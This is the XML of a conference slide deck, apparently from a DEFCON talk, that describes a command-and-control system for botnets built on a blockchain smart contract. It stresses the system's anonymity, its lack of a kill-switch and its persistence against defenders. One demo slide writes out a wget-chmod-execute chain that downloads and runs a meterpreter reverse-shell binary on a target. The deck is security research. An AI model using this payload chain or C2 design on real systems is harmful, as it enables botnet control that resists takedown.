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4" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="270" r:id="rId9"/>
    <p:sldId id="269" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="271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E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8F0DA-FB17-4EF6-A0D6-4157F6FF2892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E93E8-5CE5-4A46-A20F-E45009F3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03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to the fact that we are not the first to use these and we definitely wont be the last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E93E8-5CE5-4A46-A20F-E45009F3C4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voice track to talk about what a Solidity Smart Contract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E93E8-5CE5-4A46-A20F-E45009F3C4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70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2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4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70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9947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22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52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3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50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5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4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6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9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6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6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5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8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DB160F-1031-45B5-B6FD-F1D96E97D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12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Qw4w9WgXc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94BA-862B-432D-9DF0-4B7161668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DAPPin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that Gas</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>A Blockchain Enabled C2 Solution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31752-BA44-4073-B3FB-294952685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82535"/>
            <a:ext cx="9440034" cy="8171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shiloh (Cooper Wiegand)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>⚕Dr. ALE🍺 (Dr. Aaron Estes)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1024041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DAE3-BA56-4269-BA0D-C3A46BE6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[Future Slide] Mitigations and Practicality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E5C8E-7788-4A79-AC29-1D5CC0045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about Mitigations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Something about how you will still probably need some actual servers for data exfil and such</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Something about how there are other blockchains that are faster and cheaper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Something about how it can be used in case your primary C2 is lost </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5137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1764-F634-4B3E-9EF5-C5AC638D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[Demo] Blockchain C2 Commanding a Local Botnet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B26B25-B954-4BC9-884F-BDFB6F034C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919119" y="1746703"/>
            <a:ext cx="10353762" cy="23779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Post Message:</a:t>
            </a:r>
          </a:p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~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wget https://github.com/Cooperw/meterpreter_executables/raw/main/linux_x64_meterpreter_reverse_tcp_local_4444.elf;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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> +x linux_x64_meterpreter_reverse_tcp_local_4444.elf;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35E21E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./linux_x64_meterpreter_reverse_tcp_local_4444.elf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="36900" indent="0">
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buNone/>
            </a:pP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OpCode 0 =&gt; “Run Raw Command”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download some meterpreter code to the target device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Designate the script executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35E21E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execute the downloaded script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3B755A-3810-429E-96AA-E3EF599BA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5" y="4441041"/>
            <a:ext cx="3467431" cy="12501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EB9122-A8A8-42F5-AC5D-F0970FE41D60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1038785" y="5692685"/>
            <a:ext cx="3467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Preparing a command for our C2 Smart Contract using the Remix IDE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712CE3-56A8-47CE-8375-DD8CA3AE9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511" y="2644442"/>
            <a:ext cx="4324818" cy="30467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E4EC02-A2D3-4BF0-B06B-555A54012BEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6951511" y="5691204"/>
            <a:ext cx="4324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25 instances of our, web3 enabled, bot endpoint</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129127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1A8B-74C2-4045-A4A1-2DDA1B4F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[Demo] Commanding an Active Botnet Walking Around DEFCON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A318-D10C-453F-9AEF-78956A7B8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surprise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251186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5B7B-0CC6-447C-8CDA-37D8CB07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33CA-CF10-46F8-8689-730A31BA8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https://coinmarketcap.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ieeexplore.ieee.org/document/9236965 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.techtarget.com/searchsecurity/feature/Command-and-control-servers-The-puppet-masters-that-govern-malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://web3-technology-stack.readthedocs.io/en/latest/layer_3/apis/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4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B4A3-0A53-4AE9-B11E-D930B40B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6397A4-A39C-45D1-8978-33EE371CC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840704"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2026676" y="1675476"/>
          <a:ext cx="8128000" cy="4450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505451">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1792630820"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="622549">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1340093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of 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8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is a Command and Control (C2) Server?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0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is a Blockchain?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8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Benefits of a Blockchain Based C2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5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C2 Solidity Smart Contract (DAPP)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0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Infected Device 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6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[Demo] Blockchain C2 Simple Commanding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96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[Future Slide] Additional Vectors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409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[Future Slide] Mitigations and Practicality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52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[Demo] Blockchain C2 Commanding a Local Botnet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433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[Demo] Commanding an Active Botnet Walking Around DEFCON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8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86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27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5DF8-CAB1-4CD5-BBB9-6CC00BDC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Command and Control (C2) Server?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6A13C32-B4A9-4119-BA0B-B22AD28C3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613" y="1726835"/>
            <a:ext cx="5064125" cy="27977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0CCA6E-FBC9-4E69-8578-2AA0F9573030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1525253" y="5279004"/>
            <a:ext cx="9130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“Command-and-control servers, also called C&amp;C or C2, are used by attackers to maintain communications with compromised systems within a target network.” (TechTarget)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68416-C2D7-4721-A0B4-AAC6BA3873D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3558613" y="4524631"/>
            <a:ext cx="5064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Possible network topology of a traditional C2 server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93775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405B-9EC9-45C9-AECD-2635DC12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71608-54DE-45B9-9AFA-988BFD69B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31276"/>
            <a:ext cx="10353762" cy="17672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“Distributed Ledger”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A blockchain is a growing list of records, called blocks, that are linked together using cryptography.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once a new block is linked to the chain, it and all previous blocks are forever unalterable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>Some blockchains, such as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ethereum blockchain, can host and process code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2CD76C5-79BC-44A1-8394-989DCDC41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717" y="3652117"/>
            <a:ext cx="2465157" cy="2596283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232E36A-3146-4ED8-8045-F2788C89D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192" y="3652117"/>
            <a:ext cx="2429093" cy="2606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39F52-AA2C-41EF-A672-D01AE9236496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394193" y="6310058"/>
            <a:ext cx="2429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Blockchain operating as a “Ledger”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BB5A87-DF7C-4505-8A8F-BCA993E36BED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7368714" y="6310058"/>
            <a:ext cx="2465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Network of synchronized Ethereum Nodes creating a “Distributed Ledger”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175315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C2D3-FD4C-4183-A2F0-EF54E628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 Blockchain Based C2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7B675-ED51-4CA9-87FA-907F617D1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09" y="1711509"/>
            <a:ext cx="5249680" cy="474513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Anonymity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commands are sent utilizing anonymous blockchain wallets (burner wallets can be rapidly created)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web3 providers/routes can be created and destroyed anonymously</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>API hijacking can help obscure origin and shift blame to others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Resiliency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is no "kill-switch", data is protected by a network churning “billions” (CoinMarketCap) of USD in assets each day and is duplicated across “hundreds of thousands of nodes” (IEEE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistence can be achieved via hot-swapping authorized attackers, routes in the Web3 Provider Layer, and even multiple C2 hosts within the blockchain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Autonomy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command sequences will be stored forever and will continue to take effect even if the attacker is removed from the picture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B6431A3-456E-4B03-B5AE-F9C6A1A5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996" y="2070827"/>
            <a:ext cx="5671023" cy="3736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BEDEA4-894D-4422-8A93-55F97A93220F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236444" y="5807487"/>
            <a:ext cx="5064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Possible network topology of a blockchain based C2 solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426284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78FB-1D97-4F76-8B26-2E922216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 Solidity Smart Contract (DAPP)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BE173-EF69-4155-B6C6-8DEF78EE2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987045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2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Utilizes a One -&gt; Many messaging model where commanders/shepherds send a message to whichever tags/channels they wish to communicate with</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="36900" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="36900" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Paid Functions (require “gas” to process &amp; store data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>burn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push_post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(message, [tags])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="36900" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Free Functions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get_post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>posthash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>)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get_postcount_from_address_tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(shepherd, tag)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get_posthash_from_address_tag_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(shepherd, tag, id)</a:t>
            </a:r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13073-6A89-4CB7-B21A-9C3A875C7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2099547"/>
            <a:ext cx="5870252" cy="33245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59CA6C-407C-4BAC-9621-36B364C18EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6493739" y="5424100"/>
            <a:ext cx="5064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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1"/>
              <a:t>push_post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t> method used to send commands to endpoints on infected devices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385626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94DE-72E5-4015-8B53-C73FB30A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Infected Device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82DC-4484-47C8-8A92-C7DF528FF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26" y="1747309"/>
            <a:ext cx="5493584" cy="450109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Customizable for any language that supports Web3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Javascript, Python, .NET, C++, etc.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We utilized an OpCode system to reduce the amount of data needing to be stored on the blockchain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OpCode 1: Add an additional Tag/Channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OpCode 6: Remove a C2 Relay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extendable Features / Possible Upgrades</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistence: Update Tags, Shepherds, Relays, W3 Providers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Covert: End-to-end encryption (E2EE), Auto-Disposal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5DE25-1312-4511-B149-A5E2237989DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574307" y="2393749"/>
            <a:ext cx="4933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Required Initialization Information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75CC05-0A78-4C74-9B78-71BAC58114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86"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574310" y="1747308"/>
            <a:ext cx="4933671" cy="6798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D61EE-1676-4414-A703-00A1924CFE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11" b="38887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574310" y="2769746"/>
            <a:ext cx="4933671" cy="13088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3B5C66-1BB9-471B-AD2B-3FE0CFDEEB2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574307" y="4062201"/>
            <a:ext cx="4933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Example OpCodes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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503B730-114D-44F8-ABF3-5FBD25442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47" y="4421204"/>
            <a:ext cx="4963930" cy="1514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9C624A-34A2-4D71-992C-B3F7801E56CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6544046" y="5933907"/>
            <a:ext cx="4963929" cy="263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Example Command_Received to add an additional C2 Relay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376907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344B-C7AE-40C0-A985-91DA7C5E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[Demo] Blockchain C2 Simple Commanding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4D58D-77A8-415F-9B0D-CDF67147C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89131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165B-8A83-4B91-92C9-FE6DDD39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[Future Slide] Additional Vectors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9734A-209F-463C-948C-5D91C043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Theft via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Infura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> keys (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>API hijacking)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automation of wallet and web3 provider/routes creation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Eternal auto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (commands can’t be taken down)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“long haul” C2: essentially a secondary C2 that maintains persistence over very-long periods of time, makes it difficult for defenders to totally uproot the attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gas station funding so bots can talk on blockchain for free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46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345</TotalTime>
  <Words>944</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>111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Calisto MT</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Slate</vt:lpstr>
      <vt:lpstr>DAPPin that Gas A Blockchain Enabled C2 Solution</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>What is a Command and Control (C2) Server?</vt:lpstr>
      <vt:lpstr>What is a Blockchain?</vt:lpstr>
      <vt:lpstr>Benefits of a Blockchain Based C2 Solution</vt:lpstr>
      <vt:lpstr>C2 Solidity Smart Contract (DAPP)</vt:lpstr>
      <vt:lpstr>Infected Device Endpoint</vt:lpstr>
      <vt:lpstr>[Demo] Blockchain C2 Simple Commanding</vt:lpstr>
      <vt:lpstr>[Future Slide] Additional Vectors</vt:lpstr>
      <vt:lpstr>[Future Slide] Mitigations and Practicality</vt:lpstr>
      <vt:lpstr>[Demo] Blockchain C2 Commanding a Local Botnet</vt:lpstr>
      <vt:lpstr>[Demo] Commanding an Active Botnet Walking Around DEFCON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Wiegand, Cooper - (wiegand)</dc:creator>
  <cp:lastModifiedBy>Wiegand, Cooper - (wiegand)</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-04T04:33:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-08T16:04:45Z</dcterms:modified>
</cp:coreProperties>
</file>